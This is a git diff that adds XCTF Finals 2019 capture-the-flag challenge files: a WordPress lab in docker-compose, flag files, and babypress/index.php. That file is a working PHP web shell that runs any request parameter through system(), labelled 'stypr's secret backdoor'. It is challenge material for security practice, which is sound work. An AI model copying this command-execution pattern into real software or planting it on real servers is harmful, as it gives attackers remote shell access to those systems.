stypr
diff --git a/‎XCTF_Finals_2019/README.md‎
Lines changed: 5 additions & 0 deletions b/‎XCTF_Finals_2019/README.md‎
Lines changed: 5 additions & 0 deletions
diff --git a/‎XCTF_Finals_2019/babypress/README.md‎
Lines changed: 5 additions & 0 deletions b/‎XCTF_Finals_2019/babypress/README.md‎
Lines changed: 5 additions & 0 deletions
diff --git a/‎XCTF_Finals_2019/babypress/babypress-11ca9e6ae371f2a7ee263bea842cde841ad3ff9c.zip‎
1.3 KB b/‎XCTF_Finals_2019/babypress/babypress-11ca9e6ae371f2a7ee263bea842cde841ad3ff9c.zip‎
1.3 KB
diff --git a/‎XCTF_Finals_2019/babypress/docker-compose.yml‎
Lines changed: 53 additions & 0 deletions b/‎XCTF_Finals_2019/babypress/docker-compose.yml‎
Lines changed: 53 additions & 0 deletions
diff --git a/‎XCTF_Finals_2019/babypress/flag‎
Lines changed: 1 addition & 0 deletions b/‎XCTF_Finals_2019/babypress/flag‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎XCTF_Finals_2019/babypress/index.php‎
Lines changed: 20 additions & 0 deletions b/‎XCTF_Finals_2019/babypress/index.php‎
Lines changed: 20 additions & 0 deletions
diff --git a/‎XCTF_Finals_2019/lfi2019/README.md‎
Lines changed: 1 addition & 0 deletions b/‎XCTF_Finals_2019/lfi2019/README.md‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎XCTF_Finals_2019/lfi2019/flag.php‎
Lines changed: 7 additions & 0 deletions b/‎XCTF_Finals_2019/lfi2019/flag.php‎
Lines changed: 7 additions & 0 deletions
@@ -0,0 +1,5 @@
+## XCTF Finals 2019
+
+No writeups this time. Try them for fun!
+
+![Scoreboard](scoreboard.jpg)
@@ -0,0 +1,5 @@
+## babypress
+
+Let's dig down into the easy baby-level wordpress 0day(?) exploitation!
+
+by stypr
@@ -0,0 +1,53 @@
+version: '3.3'
+
+services:
+   db:
+     image: mysql:5.7
+     volumes:
+       - my_data:/var/lib/mysql
+     networks:
+       - default
+     restart: always
+     environment:
+       MYSQL_ROOT_PASSWORD: secret_password
+       MYSQL_DATABASE: stypr
+       MYSQL_USER: stypr
+       MYSQL_PASSWORD: stypr
+
+   wordpress:
+     image: wordpress:latest
+     depends_on:
+       - db
+     ports:
+       - "8000:80"
+     networks:
+       - default
+     restart: always
+     environment:
+       WORDPRESS_DB_HOST: db:3306
+       WORDPRESS_DB_USER: stypr
+       WORDPRESS_DB_PASSWORD: stypr
+       WORDPRESS_DB_NAME: stypr
+
+   backdoor:
+     image: trafex/alpine-nginx-php7
+     depends_on:
+       - db
+       - wordpress
+     volumes:
+       - ./flag:/flag:ro
+       - ./index.php:/var/www/html/index.php:ro
+     networks:
+       - default
+     restart: always
+
+networks:
+  default:
+    driver: bridge
+    ipam:
+      driver: default
+      config:
+      - subnet: 13.37.137.0/24
+
+volumes:
+    my_data: {}
@@ -0,0 +1 @@
+flag{stypr}
@@ -0,0 +1,20 @@
+<?php
+
+$backdoor = $_REQUEST['backdoor'];
+if($backdoor){
+	@system($backdoor . " 2>&1");
+}
+
+?>
+<!doctype html>
+<html>
+<head>
+	<title>stypr's secret backdoor</title>
+</head>
+<body>
+	<form method=POST action=index.php>
+		<input type="text" name="backdoor" value="backdoor">
+		<input type="submit" value="backdoor()">
+	</form>
+</body>
+</html>
@@ -0,0 +1 @@
+Hint: Environment
@@ -0,0 +1,7 @@
+<?php
+    $flag = "FLAG{this_surely_is_a_leg1timate_f!le_1nclusion}";
+
+    if(stripos($_SERVER['SCRIPT_NAME'], "flag.php") !== false){
+        die("<!-- flag.php successfully loaded. -->");
+    }
+?>